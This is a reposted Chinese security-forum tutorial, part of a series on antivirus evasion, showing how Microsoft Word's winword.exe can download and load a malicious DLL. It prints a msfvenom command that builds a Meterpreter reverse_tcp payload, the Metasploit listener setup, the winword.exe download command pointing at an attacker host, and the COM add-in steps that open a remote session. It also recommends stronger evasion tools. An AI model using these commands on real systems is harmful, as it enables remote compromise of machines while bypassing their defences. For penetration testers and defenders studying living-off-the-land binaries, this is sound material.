"/>
·设为首页收藏本站📧邮箱修改🎁免费下载专区💎积分✅卡密📒收藏夹👽聊天室
DZ插件网 门户 网站安全 查看内容

远控免杀专题(50)-白名单winword.exe执行payload

2022-8-3 22:10| 发布者: admin| 查看: 552| 评论: 0|原作者: 白帽子

摘要: 声明:Tide安全团队原创文章,转载请声明出处!文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其...

声明:Tide安全团队原创文章,转载请声明出处!文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担!



声明:文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担!

文章打包下载及相关软件下载:https://github.com/TideSec/BypassAntiVirus

一、winword简介

winword.exe是微软Microsoft Word的主程序。该字处理程序是微软Microsoft Office组件的一部分。

二、通过winword.exe执行payload

msfvenom生成木马:

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.19.146 lport=23333 -f dll > /var/www/html/shell.dll

设置监听:

use exploit/multi/handlerset payload windows/meterpreter/reverse_tcpset lhost 192.168.19.146set lport 23333exploit

winword.exe下载payload:

winword.exe "http://192.168.19.146/shell.dll"

在未开启杀毒软件的情况下,winword.exe未对远程文件做校验直接下载到本地,下载的文件位置:

C:\Users\username\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\

在开启杀毒软件的情况下执行该下载命令时会被拦截,下载的dll文件也会被删除:

winword.exe客户端会以只读的形式乱码显示文件内容:

通过winword.exe加载dll文件,步骤如下:

文件-->选项-->添加com加载项-->到下载的dll文件位置添加dll文件

添加成功后顺利建立会话:

当火绒和360处于开启的情况下,添加木马dll会报警,但会话依旧会建立:

三、总结

  1. 使用msfvenom生成的木马在下载时就会被查杀,建议使用免杀效果更好的工具生成木马。

  2. winword.exe在加载木马时调用rundll32.exe程序,所以只能使用32位dll。

  3. 下载的木马文件即使关闭office程序后也不会被删除。

  4. vt免杀结果感人:

四、参考资料

lolbas-winword:https://lolbas-project.github.io/lolbas/OtherMSBinaries/Winword/

通过微软office下载和执行payload:https://medium.com/@reegun/unsanitized-file-validation-leads-to-malicious-payload-download-via-office-binaries-202d02db7191




E


N


D





guān


zhù



men



Tide安全团队正式成立于2019年1月是新潮信息旗下以互联网攻防技术研究为目标的安全团队,团队致力于分享高质量原创文章、开源安全工具、交流安全技术,研究方向覆盖网络攻防、Web安全、移动终端、安全开发、物联网/工控安全/AI安全等多个领域。

对安全感兴趣的小伙伴可以关注团队官网: http://www.TideSec.com 或长按二维码关注公众号:





上一篇:CVE-2021-40444漏洞深入分析
下一篇:远控免杀专题(52)-白名单psexec.exe执行payload

鲜花

握手

雷人

路过

鸡蛋

评论

您需要登录后才可以发表言论 登录立即注册
创宇盾启航版免费网站防御网站加速服务
投诉/建议联系

discuzaddons@vip.qq.com

未经授权禁止转载,复制和建立镜像,
如有违反,按照公告处理!!!
  • 联系QQ客服
  • 添加微信客服

联系DZ插件网微信客服|最近更新|Archiver|手机版|小黑屋|DZ插件网! ( 鄂ICP备20010621号-1 )|网站地图 知道创宇云防御

您的IP:3.149.26.47,GMT+8, 2024-11-9 10:38 , Processed in 0.179149 second(s), 48 queries , Gzip On, Redis On.

Powered by Discuz! X5.0 Licensed

© 2001-2024 Discuz! Team.

关灯
扫一扫添加微信客服
QQ客服返回顶部
返回顶部